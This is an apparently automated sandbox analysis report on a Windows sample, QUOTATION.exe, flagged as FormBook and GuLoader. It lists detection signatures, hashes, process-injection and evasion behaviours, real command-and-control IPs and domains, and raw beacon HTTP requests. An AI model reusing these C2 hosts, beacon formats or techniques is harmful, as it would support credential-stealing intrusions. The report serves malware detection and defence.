Windows Analysis Report
QUOTATION.exe

Overview

General Information

Sample Name:	QUOTATION.exe
Analysis ID:	830630
MD5:	9f23ccacd955392c62b1b5d4be4ed690
SHA1:	d7c9c869add707b5b41a1f11f5c82bba94eabbd7
SHA256:	7b8d50ac67b2f0de5e35909025cc1a8d15f5edd18675878c7aaa31e3fe83a9fd
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect Any.run

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

Found potential ransomware demand text

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

PE / OLE file has an invalid certificate

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: QUOTATION.exe	Virustotal: Detection: 28%			Perma Link
Source: QUOTATION.exe	ReversingLabs: Detection: 33%

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 10.2.help.exe.3d73814.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.explorer.exe.142b3814.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.firefox.exe.5ce3814.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Uses 32bit PE files

Source: QUOTATION.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49835 version: TLS 1.2

Source: QUOTATION.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, System.dll.2.dr
Source:	Binary string: maintenanceservice.pdb@ 0%P% source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr
Source:	Binary string: mshtml.pdb source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, System.dll.2.dr
Source:	Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr
Source:	Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000008.00000002.4328211307.00000000336F0000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4186562226.0000000033393000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4328211307.000000003381D000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4192719473.0000000033544000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4285759564.0000000003861000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003B3D000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003A10000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4280954827.00000000036B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr
Source:	Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000008.00000002.4328211307.00000000336F0000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4186562226.0000000033393000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4328211307.000000003381D000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4192719473.0000000033544000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4285759564.0000000003861000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003B3D000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003A10000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4280954827.00000000036B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: help.pdbGCTL source: QUOTATION.exe, 00000008.00000002.4282050831.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr
Source:	Binary string: help.pdb source: QUOTATION.exe, 00000008.00000002.4282050831.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_004062DD FindFirstFileA,FindClose,		2_2_004062DD
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		2_2_004057A2

Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.184.0.24 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.194.145.38 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.192.26.35 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.56.79.23 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.215.156.6 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.45.96 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.17.18.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.83.160.9 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.17.29.148 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 88.212.206.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 199.192.26.35:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 199.192.26.35:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 199.192.26.35:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49886 -> 34.117.168.233:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49886 -> 34.117.168.233:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49886 -> 34.117.168.233:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 2.57.90.16:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 2.57.90.16:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 2.57.90.16:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.dexmart.xyz

Yara detected Generic Downloader

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dll, type: DROPPED

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HOSTNETNL HOSTNETNL
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.buymyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.184411.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.b-tek.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.dexmart.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.maxhaidt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.aznqmd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.texasgent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.brightfms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.eta-trader.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.funvacayflorida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 199.192.26.35 199.192.26.35

Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 20 Mar 2023 14:19:18 GMTContent-Type: text/htmlContent-Length: 62299Connection: closeETag: "627b7393-f35b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 2f 69 6d 67 2f 6f 67 5f 69 6d 61 67 65 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 30 20 63 6f 6c 2d 6c 67 2d 70 75 73 68 2d 31 22 3e 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 14:19:42 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:19:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:19:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:19:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
